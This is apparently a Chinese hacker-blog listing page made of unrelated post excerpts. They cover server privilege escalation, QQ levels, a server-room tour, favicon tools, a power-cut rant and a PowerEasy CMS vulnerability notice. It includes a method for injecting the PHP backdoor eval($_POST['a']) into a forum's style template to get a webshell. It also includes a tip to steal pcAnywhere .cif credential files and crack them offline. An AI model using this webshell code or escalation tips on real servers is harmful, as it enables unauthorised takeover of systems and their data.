来源:承诺's Blog
话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了
********** 阅读全文 »
相信大家都发现重新登陆QQ后,剩余时间变为了0,QQ等级制度已在今天做出了调整,相关信息请看:http://huaidan.org/archives/294.html
查询自己的活跃天数:
http://im.qq.com/cgi-bin/special/get_level
演示(图中是我的QQ,我的QQ等级都是自己聊出来的):
来源:布拉格是张床
机房的概括图
如图可以看到共分这么几个大的功能区。先说说机房的基本要求。
第一:防静电 (大家可以看到 防静电地板。条件好的还要在盖房子的时候就在墙壁里面打上铜带做全屏蔽)
第二:恒温 、防尘 (因为拍摄视角问题,大家没看到空调。本机房安装有中央空调,但是中央空调对专业机房来说作用不大,所以还安装有5匹的柜机)
第三:足够的电力保障 (电力的重要不用赘说,一般机房不但有专线供电,而且都安装有不间断ups,可不是一般的稳压电源啊!因为一般的稳压电源有一个瞬间波动峰值,而网络电子设备最怕就是这个。)
如果还有条件的话。防雷击也要做,顺便说一下,可不是普通的避雷针就能用的!。简单就说这么多。
然后就ups 给大家拍几个图
有6个在线工具
FavIcon from Pics //这个就是在线生成favicon.ico图标了,提交任何一个图片,它会给你生成一个ICO文件,并打包下载
Favicon Validator //favicon验证
Buddy Icon from Pics //把图片转换成ICO格式,还可制作PNG格式的背景图片
Image Embellisher //制作特殊效果的图片,比如立方体,Windows徽标那样的波浪
Online Image Splitter //切割图片
Cookie Tester //cookie 测试?不明有什么用
地址:http://www.chami.com/html-kit/services/
作者:浅蓝的辐射鱼 来源:邪恶八进制信息安全团队技术论坛
*************************************/
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<<EOT
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<<EOT
.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
阅读全文 »
一个很有创意的搜索网站Baigoo
http://www.baigoo.com/
卧槽..热死我了…
昨天晚上开始停电,洗了澡,睡觉.
几乎一夜都没睡着..热的要死.. :evil:
一直到中午大概11点多时才来电..
激动,马上开空调,开电脑…
还没过半个小时,再次停电! :mad:
中午热的我连饭都吃不下..洗澡.
躺地上,旁边放点水果,放包烟,放罐可乐(都成热的了)..好久没这么轻闲,这么安静过了.
连动都不想动,一动就是一身汗..
好不容易睡着了,3点左右又被热醒了..洗澡.
然后躺地上,一动不动,看着天花板….
一躺就是3个多小时,直到刚才(6点40左右)…TNND,,终于又来电了..
开空调,开电脑…真是幸福啊~~ :mad:
卧槽!第一次这样停电,真是怕了… :shock:
作者:怪狗 文章来源:华夏黑客同盟
影响版本:
标准版 SQL版
企业版 SQL版
学校版 SQL版
政府版 SQL版
全功能版 SQL版
免费access 版
所有版本(包括免费版、商业SQL版及Access版)
不被影响的版本:2005动易ASSESS版
漏洞文件:Admin目录下 Admin_ChkPurview.asp,Admin_Login.asp,Admin_RootClass_Menu.asp
User 目录下 User_Message.asp
等级:严重
描述:
此漏洞影响全部SQL版,如果用SA连接数据库黑客可以拿到系统管理员权限。如果用普通用户连接最严重情况,可以备份脚本木马。一般情况可能改管理员登陆密码,从而达到黑客登陆动易后台。控制整个动易系统!
ACCESS版可以得到管理员md5密码! 阅读全文 »
